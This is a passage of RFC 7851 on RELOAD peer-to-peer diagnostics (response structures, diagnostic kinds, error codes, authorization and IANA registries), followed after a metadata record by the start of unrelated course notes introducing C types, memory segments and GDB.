ext_length: The length of the extended diagnostic request information in bytes. If the value is greater than or equal to 1, then some extended diagnostic information is being requested on the assumption this information will be included in the response if the recipient understands the extended request and is willing to provide it. The specific diagnostic information requested is defined in the diagnostic_extensions_list below. A value of zero indicates no extended diagnostic information is being requested. The value of ext_length MUST NOT be negative. Note that it is not the length of the entire DiagnosticsRequest data structure, but of the data making up the diagnostic_extensions_list.
diagnostic_extensions_list: Consists of one or more DiagnosticExtension structures (see below) documenting additional diagnostic information being requested. Each DiagnosticExtension consists of the following fields:
kind: A numerical code indicating the type of extension diagnostic information (see Section 9.2). Note that kinds 0xf000 - 0xfffe are reserved for overlay specific diagnostics and may be used without IANA registration for local diagnostic information. Kinds from 0x0000 to 0x003f MUST NOT be indicated in the diagnostic_extensions_list in the message request, as they may be represented using the dMFlags in a much simpler (and more space efficient) way.
diagnostic_extension_contents: The opaque data containing the request for this particular extension. This data is extension dependent.
5.2. DiagnosticsResponse Data Structure
The DiagnosticsResponse data structure is used to return the diagnostic information and has the following form:
```c
enum { (2^16-1) } DiagnosticKindId;
struct{
DiagnosticKindId kind;
opaque diagnostic_info_contents<0..2^16-1>;
}DiagnosticInfo;
struct{
uint64 expiration;
uint64 timestamp_initiated;
uint64 timestamp_received;
uint8 hop_counter;
uint32 ext_length;
DiagnosticInfo diagnostic_info_list<0..2^32-1>;
}DiagnosticsResponse;
```
The fields in the DiagnosticsResponse are as follows:
expiration: The time when the response will expire represented as the number of milliseconds elapsed since midnight Jan 1, 1970 UTC (not counting leap seconds). This will have the same values for seconds as standard UNIX time or POSIX time. This value MUST have a value between 1 and 600 seconds in the future.
timestamp_initiated: This value is copied from the diagnostics request message. The benefit of containing such a value in the response message is that the initiator node does not have to maintain the state.
timestamp_received: The time when the diagnostic request was received represented as the number of milliseconds elapsed since midnight Jan 1, 1970 UTC (not counting leap seconds). This will have the same values for seconds as standard UNIX time or POSIX time.
hop_counter: This field only appears in diagnostic responses. It MUST be exactly copied from the TTL field of the forwarding header in the received request. This information is sent back to the request initiator, allowing it to compute the number of hops that the message traversed in the overlay.
ext_length: The length of the returned DiagnosticInfo information in bytes. If the value is greater than or equal to 1, then some extended diagnostic information (as specified in the DiagnosticsRequest) was available and is being returned. In that case, this value indicates the length of the returned information. A value of zero indicates no extended diagnostic information is included either because none was requested or the request could not be accommodated. The value of ext_length MUST NOT be negative. Note that it is not the length of the entire DiagnosticsRequest data structure but of the data making up the diagnostic_info_list.
diagnostic_info_list: consists of one or more DiagnosticInfo structures containing the requested diagnostic_info_contents. The fields in the DiagnosticInfo structure are as follows:
kind: A numeric code indicating the type of information being returned. For base data requested using the dMFlags, this code corresponds to the dMFlag set and is described in Section 5.1. For diagnostic extensions, this code will be identical to the value of the DiagnosticKindId set in the "kind" field of the DiagnosticExtension of the request. See Section 9.2.
diagnostic_info_contents: Data containing the value for the diagnostic information being reported. Various kinds of diagnostic information can be retrieved. Please refer to Section 5.3 for details of the diagnostic Kind ID for the base diagnostic information that may be reported.
5.3. dMFlags and Diagnostic Kind ID Types
The dMFlags field described above is a 64-bit field that allows initiator nodes to identify up to 62 items of base information to request in a request message (the first and last flags being reserved). The dMFlags also reserves all "0"s, which means nothing is requested, and all "1"s, which means everything is requested. But at the same time, the first and last bits cannot be used for other purposes, and they MUST be set to 0 when other particular diagnostic Kind IDs are requested. When the requested base information is returned in the response, the value of the diagnostic Kind ID will correspond to the numeric field marked in the dMFlags in the request. The values for the dMFlags are defined in Section 9.1 and the diagnostic Kind IDs are defined in Section 9.2. The information contained for each value is described in this section. Access to each kind of diagnostic information MUST NOT be allowed unless compliant to the rules defined in Section 7.
STATUS_INFO (8 bits): A single-value element containing an unsigned byte representing whether or not the node is in congestion status. An example usage of STATUS_INFO is for congestion-aware routing. In this scenario, each peer has to update its congestion status periodically. An intermediate peer in the Distributed Hash Table (DHT) network will choose its next hop according to both the DHT routing algorithm and the status information. This is done to avoid increasing load on congested peers. The rightmost 4 bits are used and other bits MUST be cleared to "0"s for future use.
There are 16 levels of congestion status, with 0x00 representing zero load and 0x0f representing congestion. This document does not provide a specific method for congestion and leaves this decision to each overlay implementation. One possible option for an overlay implementation would be to take node’s CPU/memory/bandwidth usage percentage in the past 600 seconds and normalize the highest value to the range from 0x00 to 0x0f. An overlay implementation can also decide to not use all the 16 values from 0x00 to 0x0f. A future document may define an objective measure or specific algorithm for this.
ROUTING_TABLE_SIZE (32 bits): A single-value element containing an unsigned 32-bit integer representing the number of peers in the peer’s routing table. The administrator of the overlay may be interested in statistics of this value for reasons such as routing efficiency.
PROCESS_POWER (64 bits): A single-value element containing an unsigned 64-bit integer specifying the processing power of the node with MIPS as the unit. Fractional values are rounded up.
UPSTREAM_BANDWIDTH (64 bits): A single-value element containing an unsigned 64-bit integer specifying the upstream network bandwidth (provisioned or maximum, not available) of the node with units of kbit/s. Fractional values are rounded up. For multihomed hosts, this should be the link used to send the response.
DOWNSTREAM_BANDWIDTH (64 bits): A single-value element containing an unsigned 64-bit integer specifying the downstream network bandwidth (provisioned or maximum, not available) of the node with kbit/s as the unit. Fractional values are rounded up. For multihomed hosts, this should be the link the request was received from.
SOFTWARE_VERSION: A single-value element containing a US-ASCII string that identifies the manufacture, model, operating system information, and the version of the software. Given that there are a very large number of peers in some networks, and no peer is likely to know all other peer’s software, this information may be very useful to help determine if the cause of certain groups of misbehaving peers is related to specific software versions. While the format is peer defined, a suggested format is as follows: "ApplicationProductToken (Platform; OS-or-CPU) VendorProductToken (VendorComment)", for example, "MyReloadApp/1.0 (Unix; Linux x86_64) libreload-java/0.7.0 (Stonyfish Inc.)". The string is a C-style string and MUST be terminated by "\0"."\0" MUST NOT be included in the string itself to prevent confusion with the delimiter.
MACHINE_UPTIME (64 bits): A single-value element containing an unsigned 64-bit integer specifying the time the node’s underlying system has been up (in seconds).
APP_UPTIME (64 bits): A single-value element containing an unsigned 64-bit integer specifying the time the P2P application has been up (in seconds).
MEMORY_FOOTPRINT (64 bits): A single-value element containing an unsigned 64-bit integer representing the memory footprint of the peer program in kilobytes (1024 bytes). Fractional values are rounded up.
DATASIZE_STORED (64 bits): An unsigned 64-bit integer representing the number of bytes of data being stored by this node.
INSTANCES_STORED: An array element containing the number of instances of each kind stored. The array is indexed by Kind-ID. Each entry is an unsigned 64-bit integer.
MESSAGES_SENT_RCVD: An array element containing the number of messages sent and received. The array is indexed by method code. Each entry in the array is a pair of unsigned 64-bit integers (packed end to end) representing sent and received.
EWMA_BYTES_SENT (32 bits): A single-value element containing an unsigned 32-bit integer representing an exponential weighted average of bytes sent per second by this peer:
\[ \text{sent} = \alpha \times \text{sent} \text{present} + (1 - \alpha) \times \text{sent} \text{last} \]
where sent_present represents the bytes sent per second since the last calculation and sent_last represents the last calculation of
bytes sent per second. A suitable value for alpha is 0.8 (or another value as determined by the implementation). This value is calculated every five seconds (or another time period as determined by the implementation). The value for the very first time period should simply be the average of bytes sent in that time period.
**EWMA_BYTES_RCVD (32 bits):** A single-value element containing an unsigned 32-bit integer representing an exponential weighted average of bytes received per second by this peer:
\[
\text{rcvd} = \alpha \times \text{rcvd\_present} + (1 - \alpha) \times \text{rcvd\_last}
\]
where rcvd\_present represents the bytes received per second since the last calculation and rcvd\_last represents the last calculation of bytes received per second. A suitable value for alpha is 0.8 (or another value as determined by the implementation). This value is calculated every five seconds (or another time period as determined by the implementation). The value for the very first time period should simply be the average of bytes received in that time period.
**UNDERLAY_HOP (8 bits):** Indicates the IP-layer hops from the intermediate peer, which receives the diagnostics message to the next-hop peer for this message. (Note: RELOAD does not require the intermediate peers to look into the message body. So, here we use PathTrack to gather underlay hops for diagnostics purpose).
**BATTERY_STATUS (8 bits):** The leftmost bit is used to indicate whether this peer is using a battery or not. If this bit is clear (set to "0"), then the peer is using a battery for power. The other 7 bits are to be determined by specific applications.
6. Message Processing
6.1. Message Creation and Transmission
When constructing either a Ping message with diagnostic extensions or a PathTrack message, the sender first creates and populates a DiagnosticsRequest data structure. The timestamp_initiated field is set to the current time, and the expiration field is constructed based on this time. The sender includes the dMFlags field in the structure, setting any number (including all) of the flags to request particular diagnostic information. The sender MAY leave all the bits unset, thereby requesting no particular diagnostic information.
The sender MAY also include diagnostic extensions in the DiagnosticsRequest data structure to request additional information.
If the sender includes any extensions, it MUST calculate the length of these extensions and set the ext_length field to this value. If no extensions are included, the sender MUST set ext_length to zero.
The format of the DiagnosticRequest data structure and its fields MUST follow the restrictions defined in Section 5.1.
When constructing a Ping message with diagnostic extensions, the sender MUST create a MessageExtension structure as defined in RELOAD [RFC6940], setting the value of type to 0x2 and the value of critical to FALSE. The value of extension_contents MUST be a DiagnosticsRequest structure as defined above. The message MAY be directed to a particular NodeID or ResourceID but MUST NOT be sent to the broadcast NodeID.
When constructing a PathTrack message, the sender MUST set the message_code for the RELOAD MessageContents structure to path_track_req 0x27. The request field of the PathTrackReq MUST be set to the DiagnosticsRequest data structure defined above. The destination field MUST be set to the desired destination, which MAY be either a NodeID or ResourceID but SHOULD NOT be the broadcast NodeID.
When a request arrives at a peer, if the peer’s responsible ID space does not cover the destination ID of the request, then the peer MUST continue processing this request according to the overlay specified routing mode from RELOAD protocol.
In P2P overlay, error responses to a message can be generated by either an intermediate peer or the responsible peer. When a request is received at a peer, the peer may find connectivity failures or malfunctioning peers through the predefined rules of the overlay network, e.g., by analyzing the Via List or underlay error messages. In this case, the intermediate peer returns an error response to the initiative node, reporting any malfunction node information available in the error message payload. All error responses generated MUST contain the appropriate error code.
Each intermediate peer receiving a Ping message with extensions (and that understands the extension) or receiving a PathTrack request / response MUST check the expiration value (Unix time format) to determine if the message is expired. If the message expired, the intermediate peer MUST generate a response with error code 0x17 "Error_Message_Expired", return the response to the initiator node, and discard the message.
The intermediate peer MUST return an error response with the error code 0x15 "Error_Underlay_Destination_Unreachable" when it receives an ICMP message with "Destination Unreachable" information after forwarding the received request to the destination peer.
The intermediate peer MUST return an error response with the error code 0x16 "Error_Underlay_Time_Exceeded" when it receives an ICMP message with "Time Exceeded" information after forwarding the received request.
The peer MUST return an error response with error code 0x18 "Error_Upstream_Misrouting" when it finds its upstream peer disobeys the routing rules defined in the overlay. The immediate upstream peer information MUST also be conveyed to the initiator node.
The peer MUST return an error response with error code 0x19 "Error_Loop_Detected" when it finds a loop through the analysis of the Via List.
The peer MUST return an error response with error code 0x1a "Error_TTL_Hops_Exceeded" when it finds that the TTL field value is no more than 0 when forwarding.
6.3. Message Response Creation
When a diagnostic request message arrives at a peer, it is responsible for the destination ID specified in the forwarding header, and assuming it understands the extension (in the case of Ping) or the new request type PathTrack, it MUST follow the specifications defined in RELOAD to form the response header, and perform the following operations:
- When constructing a PathTrack response, the sender MUST set the message_code for the RELOAD MessageContents structure to path_track_ans 0x28.
- The receiver MUST check the expiration value (Unix time format) in the DiagnosticsRequest to determine if the message is expired. If the message is expired, the peer MUST generate a response with the error code 0x17 "Error_Message_Expired", return the response to the initiator node, and discard the message.
- If the message is not expired, the receiver MUST construct a DiagnosticsResponse structure as follows: 1) the TTL value from the forwarding header is copied to the hop_counter field of the DiagnosticsResponse structure (note that the default value for TTL at the beginning represents 100 hops unless the overlay configuration has overridden the value), and 2) the receiver
generates a Unix time format timestamp for the current time of day and places it in the timestamp_received field and constructs a new expiration time and places it in the expiration field of the DiagnosticsResponse.
- The destination peer MUST check if the initiator node has the authority to request specific types of diagnostic information, and if appropriate, append the diagnostic information requested in the dMFlags and diagnostic_extensions (if any) using the diagnostic_info_list field to the DiagnosticsResponse structure. If any information is returned, the receiver MUST calculate the length of the response and set ext_length appropriately. If no diagnostic information is returned, ext_length MUST be set to zero.
- The format of the DiagnosticResponse data structure and its fields MUST follow the restrictions defined in Section 5.2.
- In the event of an error, an error response containing the error code followed by the description (if they exist) MUST be created and sent to the sender. If the initiator node asks for diagnostic information that they are not authorized to query, the receiving peer MUST return an error response with the error code 2 "Error_Forbidden".
6.4. Interpreting Results
The initiator node, as well as the responding peer, may compute the overlay One-Way-Delay time through the value in timestamp_received and the timestamp_initiated field. However, for a single hop measurement, the traditional measurement methods (IP-layer ping) MUST be used instead of the overlay layer diagnostics methods.
The P2P overlay network using the diagnostics methods specified in this document MUST enforce time synchronization with a central time server. The Network Time Protocol [RFC5905] can usually maintain time to within tens of milliseconds over the public Internet and can achieve better than one millisecond accuracy in local area networks under ideal conditions. However, this document does not specify the choice for time resolution and synchronization, leaving it to the implementation.
The initiator node receiving the Ping response may check the hop_counter field and compute the overlay hops to the destination peer for the statistics of connectivity quality from the perspective of overlay hops.
7. Authorization through Overlay Configuration
Different level of access control can be made for different users/nodes. For example, diagnostic information A can be accessed by nodes 1 and 2, but diagnostic information B can only be accessed by node 2.
The overlay configuration file MUST contain the following XML elements for authorizing a node to access the relative diagnostic Kinds.
diagnostic-kind: This has the attribute "kind" with the hexadecimal number indicating the diagnostic Kind ID. This attribute has the same value with Section 9.2 and at least one subelement "access-node".
access-node: This element contains one hexadecimal number indicating a NodeID, and the node with this NodeID is allowed to access the diagnostic "kind" under the same diagnostic-kind element.
8. Security Considerations
The authorization for diagnostic information must be designed with care to prevent it becoming a method to retrieve information for both attacks. It should also be noted that attackers can use diagnostics to analyze overlay information to attack certain key peers. For example, diagnostic information might be used to fingerprint a peer where the peer will lose its anonymity characteristics, but anonymity might be very important for some P2P overlay networks, and defenses against such fingerprinting are probably very hard. As such, networks where anonymity is of very high importance may find implementation of diagnostics problematic or even undesirable, despite the many advantages it offers. As this document is a RELOAD extension, it follows RELOAD message header and routing specifications. The common security considerations described in the base document [RFC6940] are also applicable to this document. Overlays may define their own requirements on who can collect/share diagnostic information.
9. IANA Considerations
9.1. Diagnostics Flag
IANA has created a "RELOAD Diagnostics Flag" registry under protocol RELOAD. Entries in this registry are 1-bit flags contained in a 64-bit integer dMFlags denoting diagnostic information to be retrieved as described in Section 4.3.1. New entries SHALL be defined via Standards Action as per [RFC5226]. The initial contents of this registry are:
<table>
<thead>
<tr>
<th>Diagnostic Information</th>
<th>Diagnostic Flag in dMFlags</th>
<th>Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td>Reserved All 0s value</td>
<td>0x 0000 0000 0000 0000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>Reserved First Bit</td>
<td>0x 0000 0000 0000 0001</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>STATUS_INFO</td>
<td>0x 0000 0000 0000 0002</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>ROUTING_TABLE_SIZE</td>
<td>0x 0000 0000 0000 0004</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>PROCESS_POWER</td>
<td>0x 0000 0000 0000 0008</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>UPSTREAM_BANDWIDTH</td>
<td>0x 0000 0000 0000 0010</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>DOWNSSTREAM_BANDWIDTH</td>
<td>0x 0000 0000 0000 0020</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>SOFTWARE_VERSION</td>
<td>0x 0000 0000 0000 0040</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MACHINE_UPTIME</td>
<td>0x 0000 0000 0000 0080</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>APP_UPTIME</td>
<td>0x 0000 0000 0000 0100</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MEMORY_FOOTPRINT</td>
<td>0x 0000 0000 0000 0200</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>DATASIZE_STORED</td>
<td>0x 0000 0000 0000 0400</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>INSTANCES_STORED</td>
<td>0x 0000 0000 0000 0800</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MESSAGES_SENT_RCVD</td>
<td>0x 0000 0000 0000 1000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>EWMA_BYTES_SENT</td>
<td>0x 0000 0000 0000 2000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>EWMA_BYTES_RCVD</td>
<td>0x 0000 0000 0000 4000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>UNDERLAY_HOP</td>
<td>0x 0000 0000 0000 8000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>BATTERY_STATUS</td>
<td>0x 0000 0000 0001 0000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>Reserved Last Bit</td>
<td>0x 8000 0000 0000 0000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>Reserved All 1s value</td>
<td>0x ffff ffff ffff ffff</td>
<td>RFC 7851</td>
</tr>
</tbody>
</table>
9.2. Diagnostic Kind ID
IANA has created a "RELOAD Diagnostic Kind ID" registry under protocol RELOAD. Entries in this registry are 16-bit integers denoting diagnostics extension data kinds carried in the diagnostic request and response messages, as described in Sections 5.1 and 5.2. Code points from 0x0001 to 0x003e are asked to be assigned together with flags within the "RELOAD Diagnostics Flag" registry. The registration procedure for the "RELOAD Diagnostic Kind ID" registry is Standards Action as defined in RFC 5226.
<table>
<thead>
<tr>
<th>Diagnostic Kind</th>
<th>Code</th>
<th>Specification</th>
</tr>
</thead>
<tbody>
<tr>
<td>Reserved</td>
<td>0x0000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>STATUS_INFO</td>
<td>0x0001</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>ROUTING_TABLE_SIZE</td>
<td>0x0002</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>PROCESS_POWER</td>
<td>0x0003</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>UPSTREAM_BANDWIDTH</td>
<td>0x0004</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>DOWNSTREAM_BANDWIDTH</td>
<td>0x0005</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>SOFTWARE_VERSION</td>
<td>0x0006</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MACHINE_UPTIME</td>
<td>0x0007</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>APP_UPTIME</td>
<td>0x0008</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MEMORY_FOOTPRINT</td>
<td>0x0009</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>DATASIZE_STORED</td>
<td>0x000a</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>INSTANCES_STORED</td>
<td>0x000b</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MESSAGES_SENT_RCVD</td>
<td>0x000c</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>EWMA_BYTES_SENT</td>
<td>0x000d</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>EWMA_BYTES_RCVD</td>
<td>0x000e</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>UNDERLAY_HOP</td>
<td>0x000f</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>BATTERY_STATUS</td>
<td>0x0010</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>Unassigned</td>
<td>0x0011-0x003e</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>local use (Reserved)</td>
<td>0xf000-0xfffe</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>Reserved</td>
<td>0xffffffff</td>
<td>RFC 7851</td>
</tr>
</tbody>
</table>
Table 1: Diagnostic Kind
9.3. Message Codes
This document introduces two new types of messages and their responses, so the following additions have been made to the "RELOAD Message Codes" registry defined in RELOAD [RFC6940].
+-------------------+------------+----------+
| Message Code Name | Code Value | RFC |
+-------------------+------------+----------+
| path_track_req | 0x27 | RFC 7851 |
| path_track_ans | 0x28 | RFC 7851 |
+-------------------+------------+----------+
Table 2: Extensions to RELOAD Message Codes
9.4. Error Code
This document introduces the following new error codes, which have been added to the "RELOAD Error Codes" registry.
+----------------------------------------+------------+-----------+
| Error Code Name | Code Value | Reference |
+----------------------------------------+------------+-----------+
| Error_Underlay_Destination_Unreachable | 0x15 | RFC 7851 |
| Error_Underlay_Time_Exceeded | 0x16 | RFC 7851 |
| Error_Message_Expired | 0x17 | RFC 7851 |
| Error_Upstream_Misrouting | 0x18 | RFC 7851 |
| Error_Loop_Detected | 0x19 | RFC 7851 |
| Error_TTL_Hops_Exceeded | 0x1A | RFC 7851 |
+----------------------------------------+------------+-----------+
Table 3: RELOAD Error Codes
9.5. Message Extension
This document introduces the following new RELOAD extension code:
+-----------------+------+-----------+
| Extension Name | Code | Reference |
+-----------------+------+-----------+
| Diagnostic_Ping | 0x2 | RFC 7851 |
+-----------------+------+-----------+
Table 4: New RELOAD Extension Code
9.6. XML Name Space Registration
This document registers a URI for the config-diagnostics XML namespace in the IETF XML registry defined in [RFC3688]. All the elements defined in this document belong to this namespace.
Registrant Contact: The IESG.
XML: N/A; the requested URIs are XML namespaces
The overlay configuration file MUST contain the following XML language declaring P2P diagnostics as a mandatory extension to RELOAD.
<mandatory-extension>
urn:ietf:params:xml:ns:p2p:config-diagnostics
</mandatory-extension>
10. References
10.1. Normative References
10.2. Informative References
Appendix A. Examples
Below, we sketch how these metrics can be used.
A.1. Example 1
A peer may set EWMA_BYTES_SENT and EWMA_BYTES_RCVD flags in the PathTrackReq to its direct neighbors. A peer can use EWMA_BYTES_SENT and EWMA_BYTES_RCVD of another peer to infer whether it is acting as a media relay. It may then choose not to forward any requests for media relay to this peer. Similarly, among the various candidates for filling up a routing table, a peer may prefer a peer with a large UPTIME value, small RTT, and small LAST_CONTACT value.
A.2. Example 2
A peer may set the STATUS_INFO Flag in the PathTrackReq to a remote destination peer. The overlay has its own threshold definition for congestion. The peer can obtain knowledge of all the status information of the intermediate peers along the path, then it can choose other paths to that node for the subsequent requests.
A.3. Example 3
A peer may use Ping to evaluate the average overlay hops to other peers by sending PingReq to a set of random resource or node IDs in the overlay. A peer may adjust its timeout value according to the change of average overlay hops.
Appendix B. Problems with Generating Multiple Responses on Path
An earlier draft version of this document considered an approach where a response was generated by each intermediate peer as the message traversed the overlay. This approach was discarded. One reason this approach was discarded was that it could provide a DoS mechanism, whereby an attacker could send an arbitrary message claiming to be from a spoofed "sender" the real sender wished to attack. As a result of sending this one message, many messages would be generated and sent back to the spoofed "sender" -- one from each intermediate peer on the message path. While authentication mechanisms could reduce some risk of this attack, it still resulted in a fundamental break from the request-response nature of the RELOAD protocol, as multiple responses are generated to a single request. Although one request with responses from all the peers in the route will be more efficient, it was determined to be too great a security risk and a deviation from the RELOAD architecture.
Acknowledgments
We would like to thank Zheng Hewen for the contribution of the initial draft version of this document. We would also like to thank Bruce Lowekamp, Salman Baset, Henning Schulzrinne, Jiang Haifeng, and Marc Petit-Huguenin for the email discussion and their valued comments, and special thanks to Henry Sinnreich for contributing to the usage scenarios text. We would like to thank the authors of the RELOAD protocol for transferring text about diagnostics to this document.
Authors’ Addresses
Haibin Song
Huawei
Email: haibin.song@huawei.com
Jiang Xingfeng
Huawei
Email: jiangxingfeng@huawei.com
Roni Even
Huawei
14 David Hamelech
Tel Aviv 64953
Israel
Email: ron.even.tlv@gmail.com
David A. Bryan
ethernot.org
Cedar Park, Texas
United States
Email: dbryan@ethernot.org
Yi Sun
ICT
Email: sunyi@ict.ac.cn
|
{"Source-Url": "https://www.ietf.org/rfc/rfc7851.txt.pdf", "len_cl100k_base": 12399, "olmocr-version": "0.1.53", "pdf-total-pages": 30, "total-fallback-pages": 0, "total-input-tokens": 60516, "total-output-tokens": 14572, "length": "2e13", "weborganizer": {"__label__adult": 0.0003781318664550781, "__label__art_design": 0.0003676414489746094, "__label__crime_law": 0.0007777214050292969, "__label__education_jobs": 0.0014944076538085938, "__label__entertainment": 0.00033211708068847656, "__label__fashion_beauty": 0.0001773834228515625, "__label__finance_business": 0.000690460205078125, "__label__food_dining": 0.0003497600555419922, "__label__games": 0.0013294219970703125, "__label__hardware": 0.004413604736328125, "__label__health": 0.0004405975341796875, "__label__history": 0.0005846023559570312, "__label__home_hobbies": 9.59634780883789e-05, "__label__industrial": 0.0005970001220703125, "__label__literature": 0.0006756782531738281, "__label__politics": 0.00044608116149902344, "__label__religion": 0.0004897117614746094, "__label__science_tech": 0.311767578125, "__label__social_life": 0.0002111196517944336, "__label__software": 0.1749267578125, "__label__software_dev": 0.498291015625, "__label__sports_fitness": 0.0003809928894042969, "__label__transportation": 0.0005640983581542969, "__label__travel": 0.0002834796905517578}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 58126, 0.05184]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 58126, 0.47649]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 58126, 0.8281]], "google_gemma-3-12b-it_contains_pii": [[0, 1077, false], [1077, 1077, null], [1077, 3788, null], [3788, 6330, null], [6330, 8296, null], [8296, 10901, null], [10901, 13537, null], [13537, 15655, null], [15655, 17591, null], [17591, 19393, null], [19393, 21216, null], [21216, 23431, null], [23431, 24963, null], [24963, 27243, null], [27243, 28884, null], [28884, 31361, null], [31361, 33649, null], [33649, 35952, null], [35952, 38326, null], [38326, 40740, null], [40740, 42985, null], [42985, 45230, null], [45230, 47053, null], [47053, 48942, null], [48942, 50516, null], [50516, 52209, null], [52209, 53738, null], [53738, 55123, null], [55123, 57301, null], [57301, 58126, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1077, true], [1077, 1077, null], [1077, 3788, null], [3788, 6330, null], [6330, 8296, null], [8296, 10901, null], [10901, 13537, null], [13537, 15655, null], [15655, 17591, null], [17591, 19393, null], [19393, 21216, null], [21216, 23431, null], [23431, 24963, null], [24963, 27243, null], [27243, 28884, null], [28884, 31361, null], [31361, 33649, null], [33649, 35952, null], [35952, 38326, null], [38326, 40740, null], [40740, 42985, null], [42985, 45230, null], [45230, 47053, null], [47053, 48942, null], [48942, 50516, null], [50516, 52209, null], [52209, 53738, null], [53738, 55123, null], [55123, 57301, null], [57301, 58126, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 58126, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 58126, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 58126, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 58126, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 58126, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 58126, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 58126, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 58126, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 58126, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 58126, null]], "pdf_page_numbers": [[0, 1077, 1], [1077, 1077, 2], [1077, 3788, 3], [3788, 6330, 4], [6330, 8296, 5], [8296, 10901, 6], [10901, 13537, 7], [13537, 15655, 8], [15655, 17591, 9], [17591, 19393, 10], [19393, 21216, 11], [21216, 23431, 12], [23431, 24963, 13], [24963, 27243, 14], [27243, 28884, 15], [28884, 31361, 16], [31361, 33649, 17], [33649, 35952, 18], [35952, 38326, 19], [38326, 40740, 20], [40740, 42985, 21], [42985, 45230, 22], [45230, 47053, 23], [47053, 48942, 24], [48942, 50516, 25], [50516, 52209, 26], [52209, 53738, 27], [53738, 55123, 28], [55123, 57301, 29], [57301, 58126, 30]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 58126, 0.16176]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
e541622c72d6bb4dbc18bef3651ad28e70ccc46e
|
1 C
C is often the programming language of choice in operating systems. C grants programmers low-level access to memory which is very useful. You’ll be reading and writing a lot of C code throughout this class.
Types
C is statically typed where types are known at compile time. However, C is also weakly typed meaning you can cast between any types. This gives the necessary flexibility for working with low-level memory, but it also opens up many avenues for errors if you’re not careful.
The primitive types include char, short, int, long, float, and double. The size of data types may vary depending on the operating system, so it’s best to check using the operator sizeof.
Arrays, denoted with [] (e.g. int[]), are contiguous regions of memory of fixed size. Each element is the size of the data type corresponding to that array. A string in C is just an array of characters with a last element as null to indicate the end of the string.
Users can define compound data types using structs which are contiguous pieces of memory comprised of multiple other data types.
Pointers are references that hold the address of an object in memory. Fundamentally, pointers are just unsigned integers of size equal to the number of bits supported by the operating system. Prefixing a pointer with * will return the value at the memory address that the pointer is holding. On the other hand, prefixing a variable with & will return the memory address of the variable.
Memory
A typical C program’s memory is divided into five segments.
<table>
<thead>
<tr>
<th>Segment</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td>Text</td>
<td>Machine code of the compiled program</td>
</tr>
<tr>
<td>Initialized Data</td>
<td>Initialized global and static memory</td>
</tr>
<tr>
<td>Uninitialized Data</td>
<td>Uninitialized global and static memory</td>
</tr>
<tr>
<td>Heap</td>
<td>Dynamically allocated memory</td>
</tr>
<tr>
<td>Stack</td>
<td>Local variables and argument passing</td>
</tr>
</tbody>
</table>
In general, memory can be thought of as a giant array with elements of one byte where a memory address indexes into this array.
Unlike stack memory, heap memory needs to be explicitly managed by the user. Memory can be allocated in the heap using malloc, calloc, or realloc. These all return a pointer to a chunk of memory in heap that is the size of the amount requested. When the memory is no longer being used, it needs to be explicitly released using free.
GNU Debugger (GDB)
GNU Debugger (GDB) is a powerful tool to debug your programs. While you may have skidded by CS 61C without using it, the complicated codebase for this class will require you to be proficient with GDB. Help will not be given to those who are not able to use GDB.
The general workflow of using GDB is as follows.
1. Compile the program using the -g flag.
2. Start GDB using gdb <executable>.
